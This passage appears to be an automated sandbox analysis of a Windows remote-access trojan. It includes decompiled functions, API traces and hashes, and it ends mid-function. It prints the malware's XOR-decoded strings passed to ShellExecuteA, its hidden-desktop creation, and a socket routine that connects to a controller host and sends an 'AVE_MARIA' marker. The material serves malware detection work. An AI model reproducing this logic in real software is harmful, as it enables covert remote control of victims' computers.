				 *((intOrPtr*)(_t161 + 0x18)) = _t129;
				_t90 = 0;
				asm("movups [esp+0x20], xmm0");
				 *((intOrPtr*)(_t161 + 0x30)) = 0x73372531;
				 *((intOrPtr*)(_t161 + 0x34)) = 0x7738217b;
				 *((char*)(_t161 + 0x38)) = 0;
				do {
					_t8 = _t90 + 0x40; // 0x40
					 *(_t161 + _t90 + 0x20) =  *(_t161 + _t90 + 0x20) ^ _t8;
					_t90 = _t90 + 1;
				} while (_t90 < 0x18);
				_t91 = _t161 + 0x20;
				 *((char*)(_t161 + 0x38)) = 0;
				_t123 = _t129 - _t91;
				do {
					_t60 =  *_t91;
					 *((char*)(_t123 + _t91)) = _t60;
					_t91 = _t91 + 1;
				} while (_t60 != 0);
				_t152 = _t85;
				do {
					_t61 =  *_t85;
					_t85 = _t85 + 1;
				} while (_t61 != 0);
				_t86 = _t85 - _t152;
				_t130 = _t129 - 1;
				do {
					_t62 =  *(_t130 + 1);
					_t130 = _t130 + 1;
				} while (_t62 != 0);
				 *((intOrPtr*)(_t161 + 0x10)) = 0x31366e60;
				_t93 = _t86 >> 2;
				memcpy(_t130, _t152, _t93 << 2);
				_t162 = _t161 + 0xc;
				 *((short*)(_t162 + 0x14)) = 0x64;
				memcpy(_t152 + _t93 + _t93, _t152, _t86 & 0x00000003);
				_t163 = _t162 + 0xc;
				_t98 = 0;
				do {
					_t20 = _t98 + 0x40; // 0x40
					 *(_t163 + _t98 + 0x10) =  *(_t163 + _t98 + 0x10) ^ _t20;
					_t98 = _t98 + 1;
				} while (_t98 < 5);
				_t25 = _t163 + 0x10; // 0x31366e60
				_t124 = _t25;
				 *((char*)(_t163 + 0x15)) = 0;
				_t153 = _t124;
				do {
					_t66 =  *_t124;
					_t124 = _t124 + 1;
				} while (_t66 != 0);
				_t87 =  *(_t163 + 0x18);
				_t125 = _t124 - _t153;
				_t135 = _t87 - 1;
				do {
					_t67 =  *(_t135 + 1);
					_t135 = _t135 + 1;
				} while (_t67 != 0);
				_t100 = _t125 >> 2;
				memcpy(_t135, _t153, _t100 << 2);
				memcpy(_t153 + _t100 + _t100, _t153, _t125 & 0x00000003);
				_t165 = _t163 + 0x18;
				_t154 = _t158;
				do {
					_t70 =  *_t158;
					_t158 = _t158 + 1;
				} while (_t70 != 0);
				_t159 = _t158 - _t154;
				_t140 = _t87 - 1;
				do {
					_t71 =  *(_t140 + 1);
					_t140 = _t140 + 1;
				} while (_t71 != 0);
				asm("movaps xmm0, [0xb3def0]");
				_t106 = _t159 >> 2;
				memcpy(_t140, _t154, _t106 << 2);
				_t166 = _t165 + 0xc;
				 *((intOrPtr*)(_t166 + 0x40)) = 0x5a5b5859;
				 *((intOrPtr*)(_t166 + 0x44)) = 0x475f505e;
				asm("movups [esp+0x20], xmm0");
				 *((short*)(_t166 + 0x48)) = 0xf47;
				asm("movaps xmm0, [0xb3dee0]");
				_t73 = memcpy(_t154 + _t106 + _t106, _t154, _t159 & 0x00000003);
				_t167 = _t166 + 0xc;
				asm("movups [esp+0x30], xmm0");
				 *(_t167 + 0x4a) = _t73;
				_t111 = 0;
				do {
					_t38 = _t111 + 0x40; // 0x40
					 *(_t167 + _t111 + 0x20) =  *(_t167 + _t111 + 0x20) ^ _t38;
					_t111 = _t111 + 1;
				} while (_t111 < 0x2a);
				_t126 = _t167 + 0x20;
				 *(_t167 + 0x4a) = 0;
				_t155 = _t126;
				do {
					_t75 =  *_t126;
					_t126 = _t126 + 1;
				} while (_t75 != 0);
				_t127 = _t126 - _t155;
				_t145 = _t87 - 1;
				do {
					_t76 =  *(_t145 + 1);
					_t145 = _t145 + 1;
				} while (_t76 != 0);
				 *((intOrPtr*)(_t167 + 0x10)) = 0x6d262c23;
				_t113 = _t127 >> 2;
				_t78 = memcpy(_t145, _t155, _t113 << 2);
				_t168 = _t167 + 0xc;
				 *((intOrPtr*)(_t168 + 0x14)) = 0x233d21;
				 *((intOrPtr*)(_t168 + 0x18)) = 0x2d27312f;
				_t79 = memcpy(_t155 + _t113 + _t113, _t155, _t127 & 0x00000003);
				_t169 = _t168 + 0xc;
				 *(_t168 + 0x34) = _t79;
				_t80 = E00B46346(_t169 + 0x1c);
				ShellExecuteA(0, E00B432BE(_t169 + 0x28), _t80, _t87, _t79, _t78);
				return E00B4AE43( *(_t169 + 0x4c) ^ _t169);
			}

APIs

ShellExecuteA.SHELL32(00000000,00000000,00000000,?,00000000,00000000), ref: 00B49B75

Strings

!=#, xrefs: 00B49B43
/1'-, xrefs: 00B49B4E
`n61, xrefs: 00B49A79
YX[Z, xrefs: 00B49AD1
^P_G, xrefs: 00B49ADC
1%7s, xrefs: 00B499FE
{!8w, xrefs: 00B49A06

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: ExecuteShell
String ID: !=#$/1'-$1%7s$YX[Z$^P_G$`n61${!8w
API String ID: 587946157-266102048
Opcode ID: f831948154c95eff40004f2d3997e11bb4d9afd6e3ab5d064ae557802ded27b3
Instruction ID: fa0403e4fa46675231ce230df45d2f306ceae1ad49c2116fade0a2db004d0afa
Opcode Fuzzy Hash: f831948154c95eff40004f2d3997e11bb4d9afd6e3ab5d064ae557802ded27b3
Instruction Fuzzy Hash: EA5117711087854BCB19CF28949066FFFE1FFDA344F44069DE9C65B212DB629A0AC7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00B4616C, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 70
threadsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00B4616C() {
				short _t1;
				struct HDESK__* _t2;
				void* _t4;

				_t1 = 0x18;
				 *0xb6ae44 = 0x28;
				 *0xb6ae52 = _t1;
				 *0xb6ae50 = 1;
				asm("xorps xmm0, xmm0");
				asm("movlpd [0xb6ae48], xmm0");
				asm("movlpd [0xb6ae58], xmm0");
				 *0xb6ae60 = 0;
				asm("movlpd [0xb6ae68], xmm0");
				 *0xb6ae54 = 0;
				 *0xb6ae64 = 0;
				_t2 = OpenDesktopA(0xb699c0, 0, 1, 0x10000000);
				 *0xb6ae3c = _t2;
				if(_t2 == 0) {
					_t2 = CreateDesktopA(0xb699c0, 0, 0, 0, 0x10000000, 0);
					 *0xb6ae3c = _t2;
				}
				SetThreadDesktop(_t2);
				_t4 = CreateThread(0, 0, E00B45BB1, 0, 0, 0);
				 *0xb6ae2c = _t4;
				WaitForSingleObject(_t4, 0xffffffff);
				E00B50985( *0xb6ae74);
				E00B50985( *0xb6ae88);
				E00B50985( *0xb6ae80);
				CloseHandle( *0xb6ae2c);
				CloseHandle( *0xb6ae34);
				 *0xb6ae74 = 0;
				 *0xb6ae88 = 0;
				 *0xb6ae80 = 0;
				 *0xb6ae8c = 0;
				return 0;
			}

0x00b46171
0x00b46174
0x00b4617f
0x00b4618a
0x00b46194
0x00b4619e
0x00b461a7
0x00b461af
0x00b461b5
0x00b461bd
0x00b461c3
0x00b461c9
0x00b461cf
0x00b461d6
0x00b461de
0x00b461e4
0x00b461e4
0x00b461ea
0x00b461fa
0x00b46203
0x00b46208
0x00b46214
0x00b4621f
0x00b4622a
0x00b4623e
0x00b46246
0x00b46248
0x00b46250
0x00b46256
0x00b4625c
0x00b46265

APIs

OpenDesktopA.USER32(Tett,00000000,00000001,10000000), ref: 00B461C9
CreateDesktopA.USER32(Tett,00000000,00000000,00000000,10000000,00000000), ref: 00B461DE
SetThreadDesktop.USER32(00000000), ref: 00B461EA
CreateThread.KERNEL32(00000000,00000000,00B45BB1,00000000,00000000,00000000), ref: 00B461FA
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00B46208
CloseHandle.KERNEL32 ref: 00B4623E
CloseHandle.KERNEL32 ref: 00B46246

Strings

Tett, xrefs: 00B46199, 00B461A6, 00B461DD

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: Desktop$CloseCreateHandleThread$ObjectOpenSingleWait
String ID: Tett
API String ID: 2760691339-923551733
Opcode ID: 7a748559f049236b2680ea4d4abeb1489e5245be3a329e2a8fe14bb43206a64c
Instruction ID: b1b47b9ef85cf5855105aaa89824be1aa8ac67d45e9728e834767fc0703a743e
Opcode Fuzzy Hash: 7a748559f049236b2680ea4d4abeb1489e5245be3a329e2a8fe14bb43206a64c
Instruction Fuzzy Hash: 0221F572911240ABCB10AF26EC49D177BB9FBDA711724166AF400A32B0DEFE4844DF62

Uniqueness

Uniqueness Score: -1.00%

Function 00B5CB6A, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 253
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00B5CB6A(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr* _a4, signed short* _a8, intOrPtr _a12) {
				intOrPtr* _v8;
				short _v12;
				signed int _v32;
				intOrPtr _v40;
				signed int _v52;
				char _v272;
				short _v292;
				void* _t33;
				short* _t34;
				intOrPtr* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed short _t39;
				signed short* _t42;
				intOrPtr _t45;
				void* _t47;
				signed int _t50;
				void* _t52;
				signed int _t56;
				void* _t69;
				void* _t73;
				void* _t74;
				void* _t78;
				intOrPtr* _t85;
				short* _t87;
				intOrPtr* _t92;
				intOrPtr* _t96;
				short _t114;
				void* _t115;
				intOrPtr* _t117;
				intOrPtr _t120;
				signed int* _t121;
				intOrPtr* _t124;
				signed short _t126;
				int _t128;
				void* _t132;
				signed int _t133;

				_push(__ecx);
				_push(__ecx);
				_push(__ebx);
				_t85 = _a4;
				_push(__esi);
				_push(__edi);
				_t33 = E00B5830D(__ecx, __edx);
				_t114 = 0;
				_v12 = 0;
				_t3 = _t33 + 0x50; // 0x50
				_t124 = _t3;
				_t4 = _t124 + 0x250; // 0x2a0
				_t34 = _t4;
				 *((intOrPtr*)(_t124 + 8)) = 0;
				 *_t34 = 0;
				_t6 = _t124 + 4; // 0x54
				_t117 = _t6;
				_v8 = _t34;
				_t92 = _t85;
				_t35 = _t85 + 0x80;
				 *_t124 = _t85;
				 *_t117 = _t35;
				if( *_t35 != 0) {
					E00B5CAFB(0xb360a0, 0x16, _t117);
					_t92 =  *_t124;
					_t132 = _t132 + 0xc;
					_t114 = 0;
				}
				_push(_t124);
				if( *_t92 == _t114) {
					E00B5C460(_t92);
					goto L12;
				} else {
					if( *((intOrPtr*)( *_t117)) == _t114) {
						E00B5C584();
					} else {
						E00B5C4E9(_t92);
					}
					if( *((intOrPtr*)(_t124 + 8)) == 0) {
						_t78 = E00B5CAFB(0xb35d90, 0x40, _t124);
						_t132 = _t132 + 0xc;
						if(_t78 != 0) {
							_push(_t124);
							if( *((intOrPtr*)( *_t117)) == 0) {
								E00B5C584();
							} else {
								E00B5C4E9(0);
							}
							L12:
						}
					}
				}
				if( *((intOrPtr*)(_t124 + 8)) == 0) {
					L37:
					_t37 = 0;
					goto L38;
				} else {
					_t38 = _t85 + 0x100;
					if( *_t85 != 0 ||  *_t38 != 0) {
						_t39 = E00B5C9B4(_t38, _t124);
					} else {
						_t39 = GetACP();
					}
					_t126 = _t39;
					if(_t126 == 0 || _t126 == 0xfde8 || IsValidCodePage(_t126 & 0x0000ffff) == 0) {
						goto L37;
					} else {
						_t42 = _a8;
						if(_t42 != 0) {
							 *_t42 = _t126;
						}
						_t120 = _a12;
						if(_t120 == 0) {
							L36:
							_t37 = 1;
							L38:
							return _t37;
						} else {
							_t96 = _v8;
							_t15 = _t120 + 0x120; // 0xb540cc
							_t87 = _t15;
							 *_t87 = 0;
							_t115 = _t96 + 2;
							do {
								_t45 =  *_t96;
								_t96 = _t96 + 2;
							} while (_t45 != _v12);
							_t98 = _t96 - _t115 >> 1;
							_push((_t96 - _t115 >> 1) + 1);
							_t47 = E00B598A4(_t87, 0x55, _v8);
							_t133 = _t132 + 0x10;
							if(_t47 != 0) {
								L39:
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E00B52919();
								asm("int3");
								_t131 = _t133;
								_t50 =  *0xb69014; // 0xce6f0fb5
								_v52 = _t50 ^ _t133;
								_push(_t87);
								_push(_t126);
								_push(_t120);
								_t52 = E00B5830D(_t98, _t115);
								_t88 = _t52;
								_t121 =  *(E00B5830D(_t98, _t115) + 0x34c);
								_t128 = E00B5D2AD(_v40);
								asm("sbb ecx, ecx");
								_t56 = GetLocaleInfoW(_t128, ( ~( *(_t52 + 0x64)) & 0xfffff005) + 0x1002,  &_v292, 0x78);
								if(_t56 != 0) {
									if(E00B5BE5E(_t88, _t121, _t128,  *((intOrPtr*)(_t88 + 0x54)),  &_v272) == 0 && E00B5D3E1(_t128) != 0) {
										 *_t121 =  *_t121 | 0x00000004;
										_t121[2] = _t128;
										_t121[1] = _t128;
									}
								} else {
									 *_t121 =  *_t121 & _t56;
								}
								return E00B4AE43(_v32 ^ _t131);
							} else {
								if(E00B5DBF9(_t87, 0x1001, _t120, 0x40) == 0) {
									goto L37;
								} else {
									_t20 = _t120 + 0x80; // 0xb5402c
									_t87 = _t20;
									_t21 = _t120 + 0x120; // 0xb540cc
									if(E00B5DBF9(_t21, 0x1002, _t87, 0x40) == 0) {
										goto L37;
									} else {
										_push(0x5f);
										_t69 = E00B652C7(_t98);
										_t98 = _t87;
										if(_t69 != 0) {
											L31:
											_t22 = _t120 + 0x120; // 0xb540cc
											if(E00B5DBF9(_t22, 7, _t87, 0x40) == 0) {
												goto L37;
											} else {
												goto L32;
											}
										} else {
											_push(0x2e);
											_t74 = E00B652C7(_t98);
											_t98 = _t87;
											if(_t74 == 0) {
												L32:
												_t120 = _t120 + 0x100;
												if(_t126 != 0xfde9) {
													E00B552AD(_t98, _t126, _t120, 0x10, 0xa);
													goto L36;
												} else {
													_push(5);
													_t73 = E00B598A4(_t120, 0x10, L"utf8");
													_t133 = _t133 + 0x10;
													if(_t73 != 0) {
														goto L39;
													} else {
														goto L36;
													}
												}
											} else {
												goto L31;
											}
										}
									}
								}
							}
						}
					}
				}
			}

APIs

Part of subcall function 00B5830D: GetLastError.KERNEL32(80(,$,00000000,00000000,00B52F3C,?,00B4AB3B,80(,$,00B3DA3C,00000000,?,?,00B49006,00000000,00B3DA3C,00B3DA3C), ref: 00B58312
Part of subcall function 00B5830D: SetLastError.KERNEL32(00000000,00000007,000000FF,?,00B4AB3B,80(,$,00B3DA3C,00000000,?,?,00B49006,00000000,00B3DA3C,00B3DA3C), ref: 00B583B0

GetACP.KERNEL32(00000055,?,?,?,?,?,00B53FAC,?,?,?,?,?,?,00000004), ref: 00B5CC2B
IsValidCodePage.KERNEL32(00000000,00000055,?,?,?,?,?,00B53FAC,?,?,?,?,?,?,00000004), ref: 00B5CC56
_wcschr.LIBVCRUNTIME ref: 00B5CCEA
_wcschr.LIBVCRUNTIME ref: 00B5CCF8
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00B53FAC,00000000,00B540CC), ref: 00B5CDBB

Strings

utf8, xrefs: 00B5CD28

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
String ID: utf8
API String ID: 4147378913-905460609
Opcode ID: f3dd30a0c785afe2a39008570dfe39679995b1c51a4e5bbf570c898b570be2c6
Instruction ID: ff5509ddad90bb07e797845b30cd96b8304023521e9d6f847df136874270efa7
Opcode Fuzzy Hash: f3dd30a0c785afe2a39008570dfe39679995b1c51a4e5bbf570c898b570be2c6
Instruction Fuzzy Hash: E471F831600306AEDB25AB34CC82BBA7BEAEF44712F1441F9FD09D71C1FA74D94986A0

Uniqueness

Uniqueness Score: -1.00%

Function 00B5D2FE, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00B5D2FE(void* __ecx, signed int _a4, intOrPtr _a8) {
				short _v8;
				short _t17;
				signed int _t18;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_push(__ecx);
				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					_t12 = _a8 + 8; // 0x51ceb70f
					if(GetLocaleInfoW( *_t12, 0x20001004,  &_v8, 2) != 0) {
						_t17 = _v8;
						if(_t17 == 0) {
							_t17 = GetACP();
						}
						L25:
						return _t17;
					}
					L22:
					_t17 = 0;
					goto L25;
				}
				_t18 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = L"ACP";
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t18;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = L"OCP";
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								if(_t18 != 0) {
									_t17 = E00B56417(_t23, _t23);
									goto L25;
								}
								_t8 = _a8 + 8; // 0x51ceb70f
								if(GetLocaleInfoW( *_t8, 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t17 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t18 = _t18 | 0x00000001;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				goto L9;
			}

APIs

GetLocaleInfoW.KERNEL32(51CEB70F,2000000B,00000000,00000002,00000000,?,?,?,00B5D624,?,00000000), ref: 00B5D397
GetLocaleInfoW.KERNEL32(51CEB70F,20001004,00000000,00000002,00000000,?,?,?,00B5D624,?,00000000), ref: 00B5D3C0
GetACP.KERNEL32(?,?,00B5D624,?,00000000), ref: 00B5D3D5

Strings

ACP, xrefs: 00B5D31C
OCP, xrefs: 00B5D352

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: ec3dca596d71e90e191e6f1ee1a5ace9afac7b5bbfa869f418f372cd2ddf2066
Instruction ID: 3a226356be2a8446338ef9e969f6a735f25352f14d0801560fe79ae7d851e01d
Opcode Fuzzy Hash: ec3dca596d71e90e191e6f1ee1a5ace9afac7b5bbfa869f418f372cd2ddf2066
Instruction Fuzzy Hash: 6E21D332B04100A6E730AF64D801BAB73E6EF40B62B5686E4ED09D7110FB72DE48C75A

Uniqueness

Uniqueness Score: -1.00%

Function 00B5D4D9, Relevance: 7.7, APIs: 5, Instructions: 184
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00B5D4D9(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, signed int _a4, short* _a8, short* _a12) {
				signed int _v8;
				int _v12;
				int _v16;
				char _v20;
				signed int* _v24;
				short* _v28;
				signed int _t39;
				void* _t45;
				signed int* _t46;
				signed int _t47;
				short* _t48;
				int _t49;
				short* _t55;
				short* _t56;
				short* _t57;
				int _t65;
				int _t67;
				short* _t71;
				intOrPtr _t74;
				void* _t76;
				short* _t77;
				intOrPtr _t84;
				short* _t88;
				short* _t91;
				short** _t102;
				short* _t103;
				signed int _t105;
				signed short _t108;
				signed int _t109;
				void* _t110;

				_t39 =  *0xb69014; // 0xce6f0fb5
				_v8 = _t39 ^ _t109;
				_t88 = _a12;
				_t105 = _a4;
				_v28 = _a8;
				_v24 = E00B5830D(__ecx, __edx) + 0x50;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t45 = E00B5830D(__ecx, __edx);
				_t99 = 0;
				 *((intOrPtr*)(_t45 + 0x34c)) =  &_v20;
				_t91 = _t105 + 0x80;
				_t46 = _v24;
				 *_t46 = _t105;
				_t102 =  &(_t46[1]);
				 *_t102 = _t91;
				if(_t91 != 0 &&  *_t91 != 0) {
					_t84 =  *0xb361b4; // 0x17
					E00B5D476(_t91, 0, 0xb360a0, _t84 - 1, _t102);
					_t46 = _v24;
					_t110 = _t110 + 0xc;
					_t99 = 0;
				}
				_v20 = _t99;
				_t47 =  *_t46;
				if(_t47 == 0 ||  *_t47 == _t99) {
					_t48 =  *_t102;
					__eflags = _t48;
					if(_t48 == 0) {
						L19:
						_v20 = 0x104;
						_t49 = GetUserDefaultLCID();
						_v12 = _t49;
						_v16 = _t49;
						goto L20;
					}
					__eflags =  *_t48 - _t99;
					if(__eflags == 0) {
						goto L19;
					}
					E00B5CE10(_t91, _t99, __eflags,  &_v20);
					_pop(_t91);
					goto L20;
				} else {
					_t71 =  *_t102;
					if(_t71 == 0) {
						L8:
						E00B5CEF6(_t91, _t99, __eflags,  &_v20);
						L9:
						_pop(_t91);
						if(_v20 != 0) {
							_t103 = 0;
							__eflags = 0;
							L25:
							asm("sbb esi, esi");
							_t108 = E00B5D2FE(_t91,  ~_t105 & _t105 + 0x00000100,  &_v20);
							__eflags = _t108;
							if(_t108 == 0) {
								L22:
								L23:
								return E00B4AE43(_v8 ^ _t109);
							}
							_t55 = IsValidCodePage(_t108 & 0x0000ffff);
							__eflags = _t55;
							if(_t55 == 0) {
								goto L22;
							}
							_t56 = IsValidLocale(_v16, 1);
							__eflags = _t56;
							if(_t56 == 0) {
								goto L22;
							}
							_t57 = _v28;
							__eflags = _t57;
							if(_t57 != 0) {
								 *_t57 = _t108;
							}
							E00B5DCF7(_v16,  &(_v24[0x94]), 0x55, _t103);
							__eflags = _t88;
							if(_t88 == 0) {
								L34:
								goto L23;
							}
							_t33 =  &(_t88[0x90]); // 0xb540c5
							E00B5DCF7(_v16, _t33, 0x55, _t103);
							_t65 = GetLocaleInfoW(_v16, 0x1001, _t88, 0x40);
							__eflags = _t65;
							if(_t65 == 0) {
								goto L22;
							}
							_t36 =  &(_t88[0x40]); // 0xb54025
							_t67 = GetLocaleInfoW(_v12, 0x1002, _t36, 0x40);
							__eflags = _t67;
							if(_t67 == 0) {
								goto L22;
							}
							_t38 =  &(_t88[0x80]); // 0xb540a5
							E00B552AD(_t38, _t108, _t38, 0x10, 0xa);
							goto L34;
						}
						_t74 =  *0xb3609c; // 0x41
						_t76 = E00B5D476(_t91, _t99, 0xb35d90, _t74 - 1, _v24);
						_t110 = _t110 + 0xc;
						if(_t76 == 0) {
							L20:
							_t103 = 0;
							__eflags = 0;
							L21:
							if(_v20 != 0) {
								goto L25;
							}
							goto L22;
						}
						_t77 =  *_t102;
						_t103 = 0;
						if(_t77 == 0) {
							L14:
							E00B5CEF6(_t91, _t99, __eflags,  &_v20);
							L15:
							_pop(_t91);
							goto L21;
						}
						_t123 =  *_t77;
						if( *_t77 == 0) {
							goto L14;
						}
						E00B5CE5B(_t91, _t99, _t123,  &_v20);
						goto L15;
					}
					_t119 =  *_t71 - _t99;
					if( *_t71 == _t99) {
						goto L8;
					}
					E00B5CE5B(_t91, _t99, _t119,  &_v20);
					goto L9;
				}
			}

APIs

Part of subcall function 00B5830D: GetLastError.KERNEL32(80(,$,00000000,00000000,00B52F3C,?,00B4AB3B,80(,$,00B3DA3C,00000000,?,?,00B49006,00000000,00B3DA3C,00B3DA3C), ref: 00B58312
Part of subcall function 00B5830D: SetLastError.KERNEL32(00000000,00000007,000000FF,?,00B4AB3B,80(,$,00B3DA3C,00000000,?,?,00B49006,00000000,00B3DA3C,00B3DA3C), ref: 00B583B0

Part of subcall function 00B5830D: _free.LIBCMT ref: 00B5836F
Part of subcall function 00B5830D: _free.LIBCMT ref: 00B583A5

GetUserDefaultLCID.KERNEL32(00000055,?,?), ref: 00B5D5E5
IsValidCodePage.KERNEL32(00000000), ref: 00B5D630
IsValidLocale.KERNEL32(?,00000001), ref: 00B5D63F
GetLocaleInfoW.KERNEL32(?,00001001,00B53FA5,00000040,?,00B540C5,00000055,00000000,?,?,00000055,00000000), ref: 00B5D687
GetLocaleInfoW.KERNEL32(?,00001002,00B54025,00000040), ref: 00B5D6A6

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
String ID:
API String ID: 949163717-0
Opcode ID: 0edfec30772293881cbfd11663fb961215cefb552ea3eacd4e0402b44a18d497
Instruction ID: 622f7ea613469c4e2ea57ca1895e1b15d5dd3b72ed28ba563084437e75472bf7
Opcode Fuzzy Hash: 0edfec30772293881cbfd11663fb961215cefb552ea3eacd4e0402b44a18d497
Instruction Fuzzy Hash: 495152B1900206ABDB21DFA4DC41BAE77F8EF15706F1446E5FD14EB190EBB09948CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00B44798, Relevance: 54.5, APIs: 21, Strings: 10, Instructions: 232networkthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 00B446F7: WSAStartup.WS2_32(00000202,?), ref: 00B44718
Part of subcall function 00B446F7: socket.WS2_32(00000002,00000001,00000000), ref: 00B44729
Part of subcall function 00B446F7: gethostbyname.WS2_32(00B6AD28), ref: 00B4473B
Part of subcall function 00B446F7: htons.WS2_32(00000000), ref: 00B44763
Part of subcall function 00B446F7: connect.WS2_32(00000000,?,00000010), ref: 00B44774

SetThreadDesktop.USER32 ref: 00B447C2
send.WS2_32(00000000,AVE_MARIA,0000000A,00000000), ref: 00B447E0
send.WS2_32(00000000,00000000,00000004,00000000), ref: 00B447F9
recv.WS2_32(00000000,?,00000004,00000000), ref: 00B44818
send.WS2_32(00000000,00000000), ref: 00B44842
recv.WS2_32(00000000,?,00000004,00000000), ref: 00B44A60
TerminateThread.KERNEL32(00000000), ref: 00B44A72

Strings

AVE_MARIA, xrefs: 00B447DA
;<2, xrefs: 00B4491B
$, xrefs: 00B448A2
$, xrefs: 00B44875
(k"+, xrefs: 00B4489A
.5&/, xrefs: 00B44892
", xrefs: 00B448C8
.5&/, xrefs: 00B44865
(k"+, xrefs: 00B4486D
&8, xrefs: 00B44923

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: send$Threadrecv$DesktopStartupTerminateconnectgethostbynamehtonssocket
String ID: "$$$$$&8$(k"+$(k"+$.5&/$.5&/$;<2$AVE_MARIA
API String ID: 1660028926-2045007127
Opcode ID: 36b96d9cdb4b929401381f9bc08738d530fa00f1a9c8fbdd4e55540979469819
Instruction ID: 0f14dbb86ffcfb4e00098bf3bf3f075c9008d20db6eaee2d6ad6e7de25f4c5bc
Opcode Fuzzy Hash: 36b96d9cdb4b929401381f9bc08738d530fa00f1a9c8fbdd4e55540979469819
Instruction Fuzzy Hash: 9A81AC71148341AFE320DB64DC85F7FBBE8EF86740F10095DFA80961A0EBB4DA159B66

Uniqueness

Uniqueness Score: -1.00%

Function 00B56739, Relevance: 33.2, APIs: 22, Instructions: 188
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00B56739(signed int _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int* _v20;
				long _v24;
				long _v28;
				signed int _v32;
				void* _v40;
				void* _v44;
				signed int _v60;
				short _v62;
